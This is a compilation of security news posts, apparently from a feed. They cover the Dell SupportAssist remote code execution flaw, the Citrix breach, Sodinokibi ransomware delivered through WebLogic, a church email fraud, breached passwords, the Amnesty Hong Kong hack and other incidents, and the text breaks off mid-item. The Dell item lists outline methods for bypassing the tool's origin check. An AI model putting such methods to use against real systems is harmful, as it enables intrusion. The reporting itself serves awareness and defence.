To solve the problems Dell SupportAssist interacts with the Dell Support website and automatically detect Service Tag or Express Service Code of Dell product.

The utility performs hardware diagnostic tests and analyzes the hardware configuration of the system, including installed device drivers, and is able to install missing or available driver updates.

Dell SupportAssist tool

The software leverages a local web service that is protected using the “Access-Control-Allow-Origin” response header and implementing restrictions to accept commands only from the “dell.com” website or its subdomains,

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest. ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks” reads the analysis published by Bill Demirkapi.

“An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell.”

Demirkapi discovered that it is possible to bypass the protections implemented by Dell and download and execute malicious code from a remote server under the control of the attackers.

To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.”

Dell acknowledged the flaw as explained in a security advisory and released a security update to address it:

“An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites,” reads the advisory.

The remote code execution flaw, tracked as CVE-2019-3719, affects Dell SupportAssist Client versions prior to version 3.2.0.90.

The expert published a video PoC of the hack and the source code of the proof of concept:

Pierluigi Paganini

(SecurityAffairs – Dell SupportAssist, hacking)


The post How to Hack Dell computers exploiting a flaw in pre-installed Dell SupportAssist appeared first on Security Affairs.

Tenable experts found 15 flaws in wireless presentation systems

Experts at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, including flaws that can be exploited to remotely hack devices.

Wireless presentation systems are used to display content on a screen or through several devices, including mobile devices and laptops. These systems are widely used in enterprises and educational organizations.

Researchers at Tenable discovered 15 vulnerabilities in eight wireless presentation systems, some of them can be exploited for command injection and for gaining access to a device.

“Tenable found multiple vulnerabilities while investigating a Crestron AM-100. Tenable also discovered that the Crestron AM-100 shared a code base with the Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and possibly others.” reads the analysis published by Tenable. “The vulnerabilities listed below do not affect all devices”

The experts focused their tests on Crestron AirMedia AM-100 and AM-101 products, but systems from other vendors could be affected because these devices reuse portions of code. Experts discovered that some of the issues they discovered also impact Barco wePresent, Extron ShareLink, InFocus LiteShow, TEQ AV IT WIPS710, SHARP PN-L703WA, Optoma WPS-Pro, Blackbox HD WPS, and potentially other vendors.

wireless presentation systems

Several flaws could be exploited by a remote, unauthenticated attacker to inject operating system commands. Others issues can be exploited by
a remote, unauthenticated attacker to change admin and moderator passwords and view presentations.

The issues, including a hardcoded session ID, allow unauthenticated, remote attacker to stop, start, and disconnect any screen sharing session due to insufficient authentication checking in the moderator controls. 

Experts also found a denial-of-service (DoS) flaw and credentials stored in plain text that could be accessible to authenticated users.

Searching for Crestron AirMedia devices exposed online with Shodan, we can find hundreds of devices, most of them located in the US, followed by Canada and Finland.

Tenable started reporting the vulnerabilities to vendors in January, but at the time of the public disclosure, only Extron and Barco have released firmware updates.

Waiting for the fix, users have to configure their environments to avoid these systems being exposed to the internet.

Pierluigi Paganini

(SecurityAffairs – wireless presentation systems, hacking)

The post Tenable experts found 15 flaws in wireless presentation systems appeared first on Security Affairs.

Citrix confirmed hackers had access to its network for five months

Citrix confirmed that the hackers who breached its network stole sensitive personal information of both former and current employees for about six months.

In March, the American multinational software company Citrix disclosed a security breach, according to the firm an international cyber criminals gang gained access to its internal network. Experts at cybersecurity firm Resecurity attributed the attack to Iranian threat actors.

Hackers were able to steal business documents, but its products or services were not impacted by the attack.

Citrix discovered the intrusion after being notified by the FBI on March 6, 2019, the company announced to have secured its network and hired a forensic firm to assist with a forensic investigation of the incident.

Now the software giant Citrix provided more details about the data breach and confirmed that hackers had access to its network for roughly five months.

This week Citrix submitted a notice of data breach to the California Office of the Attorney General explaining that attackers had intermittent access to its network between October 13, 2018, and March 8, 2019.

The attackers exfiltrated files from company systems, some of them stored information on current and former employees. Exposed data includes names, social security numbers, and financial information.

“We currently believe that the cyber criminals had intermittent access to our network between October 13, 2018 and March 8, 2019 and that they removed files from our systems, which may have included files containing information about our current and former employees and, in limited cases, information about beneficiaries and/or dependents.” reads the notice of data breach sent by Citrix.

Citrix

At the time of writing it is still unclear how many people have been impacted by the data breach.

The California’s Civil Code 1798.82(a) obliges companies to report data breaches to the state’s Attorney General if more than 500 California residents are impacted. This implies that even if Citrix did not provide the total number of affected employees in the notice, at least 500 state’s residents are affected.

The company is notifying all potentially impacted individuals and providing them with free credit monitoring and fraud protection services.

“Additionally, and as a precaution, we have arranged for you, at your option, to enroll in Equifax ID Patrol, a complimentary one-year credit monitoring, dark web monitoring, and identity restoration service. ” continues the notice.

In early April, Citrix revealed that hackers likely breached its network via password spraying, that means that hackers attempted to access the accounts using commonly used passwords.

“We identified password spraying, a technique that exploits weak passwords, as the likely method by which the threat actors entered our network.” reads a blog post published by Citrix.

Pierluigi Paganini

(SecurityAffairs – Citrix, data breach)

The post Citrix confirmed hackers had access to its network for five months appeared first on Security Affairs.

Victims of ZQ Ransomware can decrypt their files for free

Good news for the victims of the ZQ Ransomware, security experts at Emisisoft have released a free decryptor tool.

Good news for the victims of the ZQ Ransomware, security experts at Emisisoft have released a free decryptor tool that allows them to decrypt files for free.

ZQ Ransomware infected users in the US, India, Polland, Brazil and the UK.

The ZQ Ransomware encrypts victim’s files using the Salsa20 and RSA-1024 algorithms. The malware adds the extension “.[w_decrypt24@qq.com].zq” to the encrypted files.

The ransomware drops a ransom note “{HELP__DECRYPT}.txt” on the victims’ machines, it includes payment instructions. Victims can contact operators behind the ransomware sending a message to the email address “w_decrypt24@qq.com”.

“Below the text of the ransom note “All of _our files are encr_pted* to decr_pt them write me to email::w_decrypt24@qq.com
Your key:
[
redacted]”

ZQ ransomware

In order to decrypt the files, victims need to provide an encrypted file and original file to decrypt. The Decryptor tool is available at the following link:

https://www.emsisoft.com/decrypter/zq

Below the step by step procedure:

  1. IMPORTANT! Make sure you remove the malware from your system first, otherwise it will repeatedly lock your system or encrypt files.
  2. Download the free Emsisoft Decrypter for ZQ.
  3. Run the executable and confirm the license agreement when asked.
  4. Click “Start” to decrypt your files. Note that this may take a while.
  5. All done! Gotta crypt ’em all!

Emsisoft has recently released several tools to help victims of several ransomware, including the CryptoPokemon ransomware, the Planetary Ransomware, the Hacked Ransomware, and the PewDiePie ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor)

The post Victims of ZQ Ransomware can decrypt their files for free appeared first on Security Affairs.

MIVD Dutch intelligence warns of Russian, Chinese cyber espionage

The Military Intelligence and Security Service (MIVD) warn of “worrying” cyber espionage activities carried out by Russia and China.


The Military Intelligence and Security Service (MIVD) warn of “worrying” cyber espionage activities carried out by Russia and China.

The warning is included in the annual report published by the Dutch intelligence that cited as an example to attack against the world chemical weapons watchdog. On September 2018, Dutch intelligence services arrested two alleged Russian spies that were planning to hack a Swiss laboratory where there was ongoing an investigation of the poisoning of the spy Sergei Skripal.

In April 2018 the Dutch authorities expelled four alleged agents from Russia’s GRU military intelligence agency for trying to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

According to the Military Intelligence and Security Service (MIVD), Russia is expanding its arsenal with cyber its cyber capabilities, Russia-linked APT groups are a threat to the Netherlands and all of European states.

MIVD

The AIVD sent a tweet indicating that an (official) English translation of the Annual Report 2018 will be released in a few weeks.

The popular cyber security researcher Matthijs Koot, published an unofficial translation of the Annual Report 2018 of the Dutch General Intelligence and Security Service (GISS, known in Dutch as AIVD)

The report described the cyber espionage activities carried out by foreign government “very worrying,” the Dutch news media outlet reported.

“The threat facing the armed forces is the theft of military technology and technological expertise, which can be used for both military and civil ends,”

“More and more countries are focusing on political and/or economic espionage. We see in our investigations that China, Iran and Russia are at the forefront of this. “

The way the Dutch intelligence disclosed the information is unusual, in the past counter-espionage operations were taken secret.

“That was necessary to increase the resilience of society, because less naivety means greater alertness to possible unwanted influences,” MIVD chief General Onno Eichelsheim said in the report.

The report pointed out that China was “actively attempting to gather military intelligence in the Netherlands”.

“The threat against defence is the stealing of military technological knowledge and technology that can be used both militarily and for civilian purposes.”

Military Intelligence and Security Service (MIVD) also warn that Iran, North Korea, Pakistan and Syria were also seeking “knowledge and goods” for their own weapons programmes in the Netherlands and other western countrie.

Dutch intelligence is urging defence companies to reinforce their security to repeal the growing threats.

Pierluigi Paganini

(SecurityAffairs – MIVD, intelligence)

The post MIVD Dutch intelligence warns of Russian, Chinese cyber espionage appeared first on Security Affairs.

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as
Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (i.e. South Korean EST Security, Cisco’s Talos), independent researchers, intelligence group.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos.” Attackers have been making use of this exploit in the wild since at least April 17. “

Sodinokibi ransomware

Crooks used PowerShell commands to download and execute malicious payloads, they demanded a ransom that ranges from $1,500 worth of BitCoin up to $2,500. The ransom doubles if the victims do not pay it within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released security patches, the experts started observing Sodinokibi ranomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continues Talos researchers.

Experts discovered that the CVE-2019-2725 has been also exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has also likely been exploited in targeted attacks.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725 ” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – sodinokibiransomware, Weblogic)

The post Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware appeared first on Security Affairs.

Norsk Hydro estimates March cyber attack cost at $50 Million

Aluminum producer Norsk Hydro estimated the cost of the massive attack cyber attack targeting the company in March at around $50 million.

How much cost a security breach? I can tell you that potential damages could be very expensive for companies, for example, the transportation giant Maersk announced in 2017 that it would incur hundreds of millions in U.S. Dollar losses due to the NotPetya ransomware massive attack.

Back to nowadays, in mid-March Global aluminum producer Norsk Hydro was hit by a “massive” cyber attack that impacted operations in several of the company’s business areas across Europe and the U.S.

The news of the cyber attack had an immediate economic impact and caused a drop in the share price of 2.0 percent in early trading on the Oslo Stock Exchange. In just one week after the ransomware attack, the company declared it had more than $40 million losses.

The company postponed the publication of the quarterly earnings to June 5 because of the cyber attack.

Norsk Hydro

According to Norsk Hydro, the overall financial impact of the massive attack would be 400-450 million Norwegian krona ($46-$52 million, 41-46 million euros..

“The cyber attack that hit us on March 19 has affected our entire global organization, with Extruded Solutions having suffered the most significant operational challenges and financial losses,” says President and CEO Svein Richard Brandtzæg- He also added that the overall financial impact of the cyber attack is estimated at NOK 400-450 million in the first quarter.

The good news for the investors is that the company has a robust cyber insurance in place with recognized insurers.

The company did not pay any ransom and has filed a complaint with Norwegian police that is investigating the incident.

“The company’s shares dropped 1.65 percent in morning trading on the Oslo Stock Exchange.” states the AFP press.

Pierluigi Paganini

(SecurityAffairs – Norsk Hydro, ransomare)

The post Norsk Hydro estimates March cyber attack cost at $50 Million appeared first on Security Affairs.

Defending Democracies Against Information Attacks

To better understand influence attacks, we proposed an approach that models democracy itself as an information system and explains how democracies are vulnerable to certain forms of information attacks that autocracies naturally resist. Our model combines ideas from both international security and computer security, avoiding the limitations of both in explaining how influence attacks may damage democracy as a whole.

Our initial account is necessarily limited. Building a truly comprehensive understanding of democracy as an information system will be a Herculean labor, involving the collective endeavors of political scientists and theorists, computer scientists, scholars of complexity, and others.

In this short paper, we undertake a more modest task: providing policy advice to improve the resilience of democracy against these attacks. Specifically, we can show how policy makers not only need to think about how to strengthen systems against attacks, but also need to consider how these efforts intersect with public beliefs­ -- or common political knowledge­ -- about these systems, since public beliefs may themselves be an important vector for attacks.

In democracies, many important political decisions are taken by ordinary citizens (typically, in electoral democracies, by voting for political representatives). This means that citizens need to have some shared understandings about their political system, and that the society needs some means of generating shared information regarding who their citizens are and what they want. We call this common political knowledge, and it is largely generated through mechanisms of social aggregation (and the institutions that implement them), such as voting, censuses, and the like. These are imperfect mechanisms, but essential to the proper functioning of democracy. They are often compromised or non-existent in autocratic regimes, since they are potentially threatening to the rulers.

In modern democracies, the most important such mechanism is voting, which aggregates citizens' choices over competing parties and politicians to determine who is to control executive power for a limited period. Another important mechanism is the census process, which play an important role in the US and in other democracies, in providing broad information about the population, in shaping the electoral system (through the allocation of seats in the House of Representatives), and in policy making (through the allocation of government spending and resources). Of lesser import are public commenting processes, through which individuals and interest groups can comment on significant public policy and regulatory decisions.

All of these systems are vulnerable to attack. Elections are vulnerable to a variety of illegal manipulations, including vote rigging. However, many kinds of manipulation are currently legal in the US, including many forms of gerrymandering, gimmicking voting time, allocating polling booths and resources so as to advantage or disadvantage particular populations, imposing onerous registration and identity requirements, and so on.

Censuses may be manipulated through the provision of bogus information or, more plausibly, through the skewing of policy or resources so that some populations are undercounted. Many of the political battles over the census over the past few decades have been waged over whether the census should undertake statistical measures to counter undersampling bias for populations who are statistically less likely to return census forms, such as minorities and undocumented immigrants. Current efforts to include a question about immigration status may make it less likely that undocumented or recent immigrants will return completed forms.

Finally, public commenting systems too are vulnerable to attacks intended to misrepresent the support for or opposition to specific proposals, including the formation of astroturf (artificial grassroots) groups and the misuse of fake or stolen identities in large-scale mail, fax, email or online commenting systems.

All these attacks are relatively well understood, even if policy choices might be improved by a better understanding of their relationship to shared political knowledge. For example, some voting ID requirements are rationalized through appeals to security concerns about voter fraud. While political scientists have suggested that these concerns are largely unwarranted, we currently lack a framework for evaluating the trade-offs, if any. Computer security concepts such as confidentiality, integrity, and availability could be combined with findings from political science and political theory to provide such a framework.

Even so, the relationship between social aggregation institutions and public beliefs is far less well understood by policy makers. Even when social aggregation mechanisms and institutions are robust against direct attacks, they may be vulnerable to more indirect attacks aimed at destabilizing public beliefs about them.

Democratic societies are vulnerable to (at least) two kinds of knowledge attacks that autocratic societies are not. First are flooding attacks that create confusion among citizens about what other citizens believe, making it far more difficult for them to organize among themselves. Second are confidence attacks. These attempt to undermine public confidence in the institutions of social aggregation, so that their results are no longer broadly accepted as legitimate representations of the citizenry.

Most obviously, democracies will function poorly when citizens do not believe that voting is fair. This makes democracies vulnerable to attacks aimed at destabilizing public confidence in voting institutions. For example, some of Russia's hacking efforts against the 2016 presidential election were designed to undermine citizens' confidence in the result. Russian hacking attacks against Ukraine, which targeted the systems through which election results were reported out, were intended to create confusion among voters about what the outcome actually was. Similarly, the "Guccifer 2.0" hacking identity, which has been attributed to Russian military intelligence, sought to suggest that the US electoral system had been compromised by the Democrats in the days immediately before the presidential vote. If, as expected, Donald Trump had lost the election, these claims could have been combined with the actual evidence of hacking to create the appearance that the election was fundamentally compromised.

Similar attacks against the perception of fairness are likely to be employed against the 2020 US census. Should efforts to include a citizenship question fail, some political actors who are disadvantaged by demographic changes such as increases in foreign-born residents and population shift from rural to urban and suburban areas will mount an effort to delegitimize the census results. Again, the genuine problems with the census, which include not only the citizenship question controversy but also serious underfunding, may help to bolster these efforts.

Mechanisms that allow interested actors and ordinary members of the public to comment on proposed policies are similarly vulnerable. For example, the Federal Communication Commission (FCC) announced in 2017 that it was proposing to repeal its net neutrality ruling. Interest groups backing the FCC rollback correctly anticipated a widespread backlash from a politically active coalition of net neutrality supporters. The result was warfare through public commenting. More than 22 million comments were filed, most of which appeared to be either automatically generated or form letters. Millions of these comments were apparently fake, and attached unsuspecting people's names and email addresses to comments supporting the FCC's repeal efforts. The vast majority of comments that were not either form letters or automatically generated opposed the FCC's proposed ruling. The furor around the commenting process was magnified by claims from inside the FCC (later discredited) that the commenting process had also been subjected to a cyberattack.

We do not yet know the identity and motives of the actors behind the flood of fake comments, although the New York State Attorney-General's office has issued subpoenas for records from a variety of lobbying and advocacy organizations. However, by demonstrating that the commenting process was readily manipulated, the attack made it less likely that the apparently genuine comments of those opposing the FCC's proposed ruling would be treated as useful evidence of what the public believed. The furor over purported cyberattacks, and the FCC's unwillingness itself to investigate the attack, have further undermined confidence in an online commenting system that was intended to make the FCC more open to the US public.

We do not know nearly enough about how democracies function as information systems. Generating a better understanding is itself a major policy challenge, which will require substantial resources and, even more importantly, common understandings and shared efforts across a variety of fields of knowledge that currently don't really engage with each other.

However, even this basic sketch of democracy's informational aspects can provide policy makers with some key lessons. The most important is that it may be as important to bolster shared public beliefs about key institutions such as voting, public commenting, and census taking against attack, as to bolster the mechanisms and related institutions themselves.

Specifically, many efforts to mitigate attacks against democratic systems begin with spreading public awareness and alarm about their vulnerabilities. This has the benefit of increasing awareness about real problems, but it may ­ especially if exaggerated for effect ­ damage public confidence in the very social aggregation institutions it means to protect. This may mean, for example, that public awareness efforts about Russian hacking that are based on flawed analytic techniques may themselves damage democracy by exaggerating the consequences of attacks.

More generally, this poses important challenges for policy efforts to secure social aggregation institutions against attacks. How can one best secure the systems themselves without damaging public confidence in them? At a minimum, successful policy measures will not simply identify problems in existing systems, but provide practicable, publicly visible, and readily understandable solutions to mitigate them.

We have focused on the problem of confidence attacks in this short essay, because they are both more poorly understood and more profound than flooding attacks. Given historical experience, democracy can probably survive some amount of disinformation about citizens' beliefs better than it can survive attacks aimed at its core institutions of aggregation. Policy makers need a better understanding of the relationship between political institutions and social beliefs: specifically, the importance of the social aggregation institutions that allow democracies to understand themselves.

There are some low-hanging fruit. Very often, hardening these institutions against attacks on their confidence will go hand in hand with hardening them against attacks more generally. Thus, for example, reforms to voting that require permanent paper ballots and random auditing would not only better secure voting against manipulation, but would have moderately beneficial consequences for public beliefs too.

There are likely broadly similar solutions for public commenting systems. Here, the informational trade-offs are less profound than for voting, since there is no need to balance the requirement for anonymity (so that no-one can tell who voted for who ex post) against other requirements (to ensure that no-one votes twice or more, no votes are changed and so on). Instead, the balance to be struck is between general ease of access and security, making it easier, for example, to leverage secondary sources to validate identity.

Both the robustness of and public confidence in the US census and the other statistical systems that guide the allocation of resources could be improved by insulating them better from political control. For example, a similar system could be used to appoint the director of the census to that for the US Comptroller-General, requiring bipartisan agreement for appointment, and making it hard to exert post-appointment pressure on the official.

Our arguments also illustrate how some well-intentioned efforts to combat social influence operations may have perverse consequences for general social beliefs. The perception of security is at least as important as the reality of security, and any defenses against information attacks need to address both.

However, we need far better developed intellectual tools if we are to properly understand the trade-offs, instead of proposing clearly beneficial policies, and avoiding straightforward mistakes. Forging such tools will require computer security specialists to start thinking systematically about public beliefs as an integral part of the systems that they seek to defend. It will mean that more military oriented cybersecurity specialists need to think deeply about the functioning of democracy and the capacity of internal as well as external actors to disrupt it, rather than reaching for their standard toolkit of state-level deterrence tools. Finally, specialists in the workings of democracy have to learn how to think about democracy and its trade-offs in specifically informational terms.

This essay was written with Henry Farrell, and has previously appeared on Defusing Disinfo.

Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack

Crooks have stolen $1.75 million in a church BEC (Business Email Compromise) attack, the victim is the Saint Ambrose Catholic Parish.

Cybercriminals have stolen $1.75 million in a BEC (Business Email Compromise) attack against the Saint Ambrose Catholic Parish.

Saint Ambrose is the second largest church in the Diocese of Cleveland and the largest church in Brunswick, Ohio.

The Saint Ambrose Catholic Parish discovered the BEC attack on April 17 when was making payments related to a Vision 2020 project that were never received by a contractor (Marous Brothers Construction).

According to the investigation conducted by the FBI and Brunswick police, hackers broke into the parish’s email system, likely via a phishing attack. Attackers were able to trick the personnel into believing that the contractor had changed their bank, and asked them to transfer the funds to a new bank account under their control.

BEC

In a letter to the parish, Fr. Bob Stec explained he was contacted by the contractor that informed him that he did receive the payments for the past two months.

“On Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months totaling approximately $1,750,000.” reads a letter sent to parish by Pastor Father Bob Stec.

“This was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.”

According to Stec, crooks accessed two St. Ambrose employees’ email accounts. Attackers only compromised the email system, they did not access to the parish database that is stored in a secure cloud-based system.

“We are working closely with the Diocese and its insurance program to file a claim in the hopes that Marous Brothers Construction can receive their payment quickly and we can bring this important project for our parish to a positive completion,” Stec said in the letter.

The parish submitted an insurance claim in the attempt of recovering the stolen money.

“At the same time, we brought in information technology consultants to review the security and stability of our system, change all passwords, and verify the integrity of our databases and other pertinent information.” Stec added. “They have determined the breach was limited to only two email accounts.”

BEC attacks represent a serious threat for businesses, according to the recently released 2018 Internet Crime Report by FBI’s Internet Crime Complaint Center (IC3), BEC scams reached $1,2 billion in profits.

“In 2018, the IC3 received 20,373 BEC/E-mail Account Compromise (EAC) complaints with adjusted losses of over $1.2 billion” reads the report.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack appeared first on Security Affairs.

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, cyber criminals have stolen other funds reaching USD $4.6 million, but the most concerning aspect of the story is that and the botnet they used continues to grow. On April 24, the botnet was composed of less than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts already monitored two malware campaigns respectively leveraging the RIG exploit kit and the Smoke Loader to deliver the ElectrumDoSMiner.

MalwareBytes also detected a previously undocumented tracked as Trojan.BeamWinHTTP that was used by crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the above loaders they discovered.

Most of the ElectrumDoSMiner infections were observed in Asia Pacific region (APAC), Brazil and Peru.

ElectrumDoSMiner

“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

Slack warns investors it might be targeted by organized crime, nation-state hackers

Slack Technologies, the company whose cloud-based collaboration tools and services are used by companies worldwide, has warned potential investors that the company faces threats from a wide variety of sources, including “sophisticated organized crime, nation-state, and nation-state supported actors.” Acknowledging the risk In the documents it was required to file with the Securities and Exchange Commission (SEC) due to its going public, the company has spelled out the many cyber threats to its existence, functioning … More

The post Slack warns investors it might be targeted by organized crime, nation-state hackers appeared first on Help Net Security.

Over 23 million breached accounts were using ‘123456’ as password

A cyber survey conducted by the United Kingdom’s National Cyber Security Centre (NCSC) revealed that ‘123456’ is still the most hacked password.

Security experts at the United Kingdom’s National Cyber Security Centre (NCSC) analyzed the 100,000 most-commonly re-occurring breached passwords using data from Have I Been Pwned (HIBP).

Have I Been Pwned allows users to search across multiple data breaches to see if their email address has been compromised.

The NCSC discovered that 23.2 million user accounts worldwide were using ‘123456’ as password, while 7.7 million users were using ‘123456789’.

This data is disconcerting and shows that we are far from to be secure even if security experts continue to warn users of cyber risks associated with the use of weak passwords.

Of course. the list of most-hacked passwords also includes other simple items like ‘qwerty’, ‘password’ and ‘1111111,’ in top five, a gift for the hackers.

The list of top breached passwords includes names, musicians, football team names, and fictional characters.

“The NCSC has also today published separate analysis of the 100,000 most commonly re-occurring passwords that have been accessed by third parties in global cyber breaches.” reads the post published by the NCSC.

“The results show a huge number of regularly used passwordsbreached to access sensitive information.”

top breached passwords

Data reported by NCSC are aligned with findings from other similar studies conducted by security firm. In December, SplashData published for the 8th year in a row the worst passwords list, the annual report based on the analysis of more than 5 million leaked passwords. Below the 2018 top 10 most used passwords published by SplashData:

  1. 123456
  2. password 
  3. 123456789
  4. 12345678
  5. 12345
  6. 111111
  7. 1234567 
  8. sunshine
  9. qwerty
  10. iloveyou

Experts suggest the adoption of strong passwords and the usage of a unique password for every service they access. Passwords should contain at least 8 characters, upper and lower case letters, numbers, and symbols (i.e. %$#!.). Another good practice is the set up of multi-factor authentication wherever possible.

Below the key findings emerged from the survey:

  • Only 15% say they know a great deal about how to protect themselves from harmful activity
  • The most regular concern is money being stolen – with 42% feeling it likely to happen by 2021
  • 89% use the internet to make online purchases – with 39% on a weekly basis 
  • One in three rely to some extent on friends and family for help on cyber security
  • Young people more likely to be privacy conscious and careful of what details they share online
  • 61% of internet users check social media daily, but 21% report they never look at social media
  • 70% always use PINs and passwords for smart phones and tablets
  • Less than half do not always use a strong, separate password for their main email account

“We understand that cyber security can feel daunting to a lot of people, but the NCSC has published lots of easily applicable advice to make you much less vulnerable.” said Dr Ian Levy, NCSC Technical Director.

“Password re-use is a major risk that can be avoided – nobody should protect sensitive data with somethisng that can be guessed, like their first name, local football team or favourite band.”

“Using hard-to-guess passwords is a strong first step and we recommend combining three random but memorable words. Be creative and use words memorable to you, so people can’t guess your password.”

Pierluigi Paganini

(SecurityAffairs – Top breached passwords, hacking)

The post Over 23 million breached accounts were using ‘123456’ as password appeared first on Security Affairs.

Amnesty International Hong Kong Office hit by state-sponsored attack

The Hong Kong office of Amnesty International has been hit by a long-running cyberattack carried out by China-linked hackers.

Amnesty International’s Hong Kong office has been hit with a cyberattack launched by China-linked hackers.

“This sophisticated cyber-attack underscores the dangers posed by state-sponsored hacking and the need to be ever vigilant to the risk of such attacks. We refuse to be intimidated by this outrageous attempt to harvest information and obstruct our human rights work,” said Man-kei Tam, Director of Amnesty International Hong Kong.

An Amnesty International’s spokesperson told the South China Morning Post that supporters’ names, Hong Kong identity card numbers and personal contact information were accessed by the hackers, no financial data was compromised.

In response to the cyber attack, the organization set up a “global task force composed of cyber security professionals. 

The organizations discovered the security breach on March 15 during a scheduled migration of the Hong Kong office IT infrastructure to its international network.

“The initial findings reveal the attacks were perpetrated using tools and techniques associated with specific advanced persistent threat groups (APTs).” reads the announcement published by Amnesty International. “Cyber forensic experts were able to establish links between the infrastructure used in this attack and previously reported APT campaigns associated with the Chinese government.”

amnesty international

The organization has notified of the incident to all people that might have been impacted by the attack, it is also providing additional guidance to further ensure their data is secure. Amnesty also reported the attack to the Hong Kong’s Office of the Privacy Commissioner for Personal Data.

According to Amnesty International, Chinese authorities are hindering cooperation between international and domestic NGOs,

The group attributed the attack to “a known APT group” that used “tactics, techniques and procedures consistent with a well developed adversary”.

“This sophisticated cyberattack underscores the dangers posed by state-sponsored hacking and the need to be ever vigilant to the risk of such attacks,” said Man-kei Tam, Director of Amnesty International Hong Kong.

“We refuse to be intimidated by this outrageous attempt to harvest information and obstruct our human rights work,” he said.

The investigation is still ongoing to determine the extent of the hack and the time window of exposure, but experts fear the attack has been happening already for a few years.

Amnesty is a privileged target for state-sponsored hackers because of its activity with other NGOs, journalists, activists, and civil rights movements worldwide. 

In August 2018, Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. 

Pierluigi Paganini

(SecurityAffairs – APT, Amnesty International)

The post Amnesty International Hong Kong Office hit by state-sponsored attack appeared first on Security Affairs.

Most SMBs would pay a ransom in order to recover stolen data

More than half (55 percent) of executives at SMBs said they would pay hackers in order to recover their stolen data in ransomware attacks, according to the second quarterly AppRiver Cyberthreat Index for Business Survey. That number jumps to 74 percent among larger SMBs that employ 150-250 employees, with nearly 4 in 10 (39 percent) going as far as saying they “definitely would pay ransom at almost any price” to prevent their data from being … More

The post Most SMBs would pay a ransom in order to recover stolen data appeared first on Help Net Security.

Critical flaw in Qualcomm chips exposes sensitive data for Android Devices

Researchers devised a new side-channel attack in Qualcomm technology, widely used by most Android smartphones, that could expose private keys.

Researchers have uncovered a new side-channel attack that could be exploited by attackers to extract sensitive data from Qualcomm secure keystore, including private keys, and passwords. The attack potentially impacts most of the modern Android devices that use Qualcomm chips,
including popular Snapdragon models 820, 835, 845 and 855

